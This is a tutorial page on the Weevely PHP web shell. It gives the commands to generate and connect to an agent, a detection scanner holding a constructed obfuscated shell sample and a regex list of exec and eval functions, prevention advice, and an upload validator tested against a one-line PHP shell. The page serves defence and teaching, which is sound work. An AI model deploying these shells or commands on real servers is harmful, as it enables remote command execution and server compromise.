Web Shell using Weevely
What is Weevely?
Weevely is a PHP web shell built for post-exploitation. It has two parts: a small, obfuscated PHP agent that is placed on the target web server, and a Python client that talks to that agent over ordinary HTTP requests and presents a terminal-like interface. Through it you can run commands, browse and transfer files, and load additional modules on the target. Commands run with the privileges of the web server process, and the client tries several PHP execution vectors so that it still works when some of the usual command-execution functions are disabled.
Weevely Example
Here is a simple example of using Weevely to create and use a web shell. The generated agent still has to be placed on the target web server by some other means (an unrestricted file upload, an existing code-execution flaw, or stolen credentials); Weevely itself does not do that step.

// Generate a Weevely PHP agent protected by the password 'secretkey'
weevely generate secretkey shell.php

// Connect to the agent once it is reachable on the target web server
weevely http://example.com/shell.php secretkey

In this example, 'weevely generate' writes an obfuscated PHP agent to shell.php; the password is baked into the agent so that only a client that knows it can send commands to it. The 'weevely' command with a URL and the password opens a session to the agent, and anything typed at the prompt is executed on the server as the web server user. The equivalent long form is 'weevely terminal http://example.com/shell.php secretkey'.
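Seen from the defender's side, the interesting question is what a dropped agent looks like on disk. The following scanner is an added example, not part of Weevely or of this page's original content: it scores PHP files for generic web shell traits (evaluation of decoded request data, function names assembled at runtime, error suppression) rather than matching any specific agent, because Weevely agents are obfuscated and exact-string signatures do not survive regeneration. The two sample files, the indicator list and its weights are all constructed for this example.

```python
import os
import re
from typing import Dict, List, Tuple

# Constructed sample files (made up for this example; not real Weevely agents).
# index.php is an ordinary application script. uploads/shell.php has the shape
# of an obfuscated agent: a function name rebuilt at runtime, request data
# decoded, and the result evaluated.
SAMPLE_FILES: Dict[str, str] = {
    "index.php": (
        "<?php\n"
        "require 'config.php';\n"
        "$page = isset($_GET['p']) ? $_GET['p'] : 'home';\n"
        "if (!in_array($page, ['home', 'about'], true)) { $page = 'home'; }\n"
        "include __DIR__ . '/pages/' . $page . '.php';\n"
    ),
    "uploads/shell.php": (
        "<?php\n"
        "$k='ZjNkYTEy';$s=str_replace('x','','bxaxsxex6x4_xdxexcxoxdxe');\n"
        "$d=$s($_POST['p']) . $s($_COOKIE['q']);\n"
        "@eval(@gzuncompress($d));\n"
    ),
}

# (indicator name, pattern, weight). Weights are this example's own choice,
# not a published scoring scheme.
INDICATORS: List[Tuple[str, "re.Pattern[str]", int]] = [
    ("eval_or_assert",
     re.compile(r"\b(eval|assert)\s*\(", re.I), 4),
    ("exec_function",
     re.compile(r"\b(system|shell_exec|passthru|exec|popen|proc_open)\s*\(", re.I), 4),
    ("decode_function",
     re.compile(r"\b(base64_decode|gzuncompress|gzinflate|str_rot13)\s*\(", re.I), 2),
    ("request_superglobal",
     re.compile(r"\$_(POST|GET|COOKIE|REQUEST)\b"), 1),
    # $name(...) calls a function whose name is only known at runtime
    ("dynamic_call",
     re.compile(r"\$[A-Za-z_]\w*\s*\("), 3),
    # str_replace('x', '', '...') is a common way to hide a function name
    ("name_obfuscation",
     re.compile(r"str_replace\s*\(\s*'[^']'\s*,\s*''"), 3),
    ("error_suppression",
     re.compile(r"@\s*[A-Za-z_]\w*\s*\("), 1),
]

DEFAULT_THRESHOLD = 6


def score_php_source(src: str) -> Tuple[int, List[str]]:
    """Return (score, names of indicators present). Each indicator counts once."""
    score, hits = 0, []
    for name, pattern, weight in INDICATORS:
        if pattern.search(src):
            score += weight
            hits.append(name)
    return score, hits


def scan_files(files: Dict[str, str], threshold: int = DEFAULT_THRESHOLD) -> Dict[str, dict]:
    """Score a mapping of path -> PHP source and flag files at or above threshold."""
    results = {}
    for path, src in files.items():
        score, hits = score_php_source(src)
        results[path] = {"score": score, "hits": hits, "suspicious": score >= threshold}
    return results


def scan_directory(root: str, threshold: int = DEFAULT_THRESHOLD) -> Dict[str, dict]:
    """Walk a real web root and score every .php/.phtml file under it."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith((".php", ".phtml")):
                path = os.path.join(dirpath, name)
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    files[path] = fh.read()
    return scan_files(files, threshold)


if __name__ == "__main__":
    for path, r in scan_files(SAMPLE_FILES).items():
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{flag:10} {r['score']:3} {path}  {', '.join(r['hits'])}")
```

Run against a real tree with scan_directory('/var/www/html'). The index.php sample scores 1 (it reads a superglobal, as most scripts do) and the shell sample scores 14, but a score is a triage hint, not proof: an agent can split its payload across several cookies, avoid a literal eval, or hide behind a legitimate-looking include. The controls that do not depend on guessing the obfuscation are a file integrity baseline of the web root and web server logs reviewed for POST requests to scripts that should never receive them.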
Prevention
A web shell is only useful to an attacker once it is on the server, so prevention starts with the ways it gets there: unrestricted file uploads, code-injection or remote-code-execution bugs in the application, local file inclusion, and stolen administrative credentials. Proper input validation, sanitization, and limiting the server's ability to execute system commands reduce both the chance of an agent landing and what it can do once it has. This includes:
- Input validation: accept only the values, types, and lengths the application expects, and reject everything else.
- Use allow lists: for file uploads, allow a short list of extensions and content types, verify that the content actually matches the declared type, and store files under a server-chosen name rather than the one the client supplied.
- Sanitize input: remove or replace special characters in user input that reaches file paths, shell commands, or include statements; treat this as a fallback behind the allow list, not a replacement for it.
- Limit system commands: keep upload directories outside the web root or configured so the web server never executes files in them, disable the PHP functions the application does not need (the disable_functions directive can cover system, exec, shell_exec, passthru, popen and proc_open), and run the web server as a low-privilege user so a planted shell inherits as little as possible.
- Detect what slips through: keep a file integrity baseline of the web root and alert on new or modified PHP files, and review web server logs for POST requests to scripts that should never receive them.
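The allow-list and validation points above, worked through as an upload validator. This is an added example written for this page, not code from Weevely or from any particular framework; the allowed types, size limit, and script markers are choices made for the example, and validate_upload is the hypothetical function a real upload handler would call before touching the disk.

```python
import os
import re
import secrets
from typing import Tuple

# Allow list: declared extension -> magic-byte prefixes the content must start with.
# Anything not listed here is rejected, including .php, .phtml, .phar and .htaccess.
ALLOWED_TYPES = {
    "jpg":  (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png":  (b"\x89PNG\r\n\x1a\n",),
    "pdf":  (b"%PDF-",),
}
MAX_BYTES = 5 * 1024 * 1024  # size limit chosen for this example
# Server-side code markers. A JPEG with '<?php' in a comment segment is still a
# valid image, but there is no reason to keep one if the upload directory could
# ever be executed, so the check fails closed.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script", b"<%")
BASENAME_RE = re.compile(r"[a-z0-9_-]{1,64}")


def validate_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason). Anything outside the allow list is rejected."""
    # Strip client-supplied path components; a mismatch means traversal was attempted.
    name = os.path.basename(filename.replace("\\", "/"))
    if name != filename or name in ("", ".", ".."):
        return False, "path components are not allowed"
    # Exactly one extension: rejects shell.php.jpg and dotfiles like .htaccess.
    parts = name.lower().split(".")
    if len(parts) != 2 or not BASENAME_RE.fullmatch(parts[0]):
        return False, "filename must be <base>.<ext> with a simple base name"
    ext = parts[1]
    if ext not in ALLOWED_TYPES:
        return False, f".{ext} is not an allowed type"
    if not data or len(data) > MAX_BYTES:
        return False, "empty or oversized upload"
    # The declared type must match the bytes, not just the name.
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return False, "content does not match the declared type"
    if any(marker in data for marker in SCRIPT_MARKERS):
        return False, "embedded script marker"
    return True, "ok"


def storage_name(ext: str) -> str:
    """Server-chosen name: the client-supplied filename never reaches the disk."""
    return secrets.token_hex(16) + "." + ext.lower()


if __name__ == "__main__":
    samples = [
        ("photo.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16),
        ("shell.php", b"<?php system($_GET['c']); ?>"),
        ("shell.php.jpg", b"\xff\xd8\xff\xe0"),
        ("../shell.jpg", b"\xff\xd8\xff\xe0"),
        ("photo.jpg", b"\xff\xd8\xff\xe0<?php echo 1; ?>"),
    ]
    for fname, blob in samples:
        print(f"{fname:16} -> {validate_upload(fname, blob)}")
```

The validator is only half of the control: the accepted file should then be written under storage_name(ext) into a directory outside the web root or one the web server is configured not to execute, so that even a file that passes every check cannot become a shell. The script-marker check is a heuristic; re-encoding images on the server side is the stronger option where the application can afford it.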